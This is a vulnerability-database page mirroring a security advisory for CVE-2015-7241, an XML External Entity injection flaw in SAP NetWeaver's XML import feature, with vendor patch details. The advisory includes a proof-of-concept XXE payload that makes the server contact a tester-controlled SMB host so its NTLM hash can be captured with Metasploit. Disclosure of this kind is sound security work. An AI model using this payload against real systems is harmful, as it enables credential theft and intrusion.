Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

SAP Netweaver XML External Entity Injection

🗓️ 21 Sep 2015 00:00:00Reported by Lukasz MiedzinskiType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 34 Views

SAP Netweaver XML External Entity Injection CVE-2015-724

Related
Code
ReporterTitlePublishedViews
Family
CNVD		SAP Netwaver XML External Entity Injection Vulnerability
29 Oct 201500:00
cnvd
CVE		CVE-2015-7241
6 Sep 201721:00
cve
Cvelist		CVE-2015-7241
6 Sep 201721:00
cvelist
Exploit DB		SAP NetWeaver < 7.01 - XML External Entity Injection
22 Sep 201500:00
exploitdb
exploitpack		SAP NetWeaver 7.01 - XML External Entity Injection
22 Sep 201500:00
exploitpack
NVD		CVE-2015-7241
6 Sep 201721:29
nvd
Prion		Xxe
6 Sep 201721:29
prion
securityvulns		SAP Netwaver - XML External Entity Injection
25 Oct 201500:00
securityvulns
securityvulns		SAP NetWeaver security vulnerabilities
25 Oct 201500:00
securityvulns
`Title: SAP Netwaver - XML External Entity Injection  
Author: Lukasz Miedzinski  
GPG: Public key provided in attachment  
Date: 29/10/2014  
CVE: CVE-2015-7241  
  
Affected software :  
===================  
  
SAP Netwear : <7.01  
  
Vendor advisories (only for customers):  
===================  
External ID : 851975 2014  
Title: XML External Entity vulnerability in SAP XML Parser  
Security Note: 2098608  
Advisory Plan Date: 12/5/2014  
Delivery date of fix/Patch Day: 10/2/2014  
CVSS Base Score: 5.5  
CVSS Base Vector: AV:N/AC:L/AU:S/C:P/I:N/A:P  
  
  
Description :  
=============  
XML External Entity Injection vulnerability has been found in the XML  
parser in the System  
  
Administration->XML Content and Actions -> Import section.  
  
  
Vulnerabilities :  
*****************  
  
XML External Entity Injection :  
======================  
  
  
Example show how pentester is able to get NTLM hash of application's user.  
  
Content of file (PoC) :  
  
<?xml version="1.0" encoding="UTF-8"?>  
<!DOCTYPE root [  
<!ENTITY % remote SYSTEM "file:////Tester.IP/test"> %remote; %param1; ]>  
<root/>  
  
When pentester has metasploit smb_capture module run, then application  
will contatc him and provide  
  
NTLM hash of user.  
  
  
Contact :  
=========  
  
Lukasz[dot]Miedzinski[at]gmail[dot]com  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
21 Sep 2015 00:00Current
0.6Low risk
Vulners AI Score0.6
EPSS0.27377
sap netweaverxml external entity injectioncve-2015-7241vulnerabilityparsersecurity note
34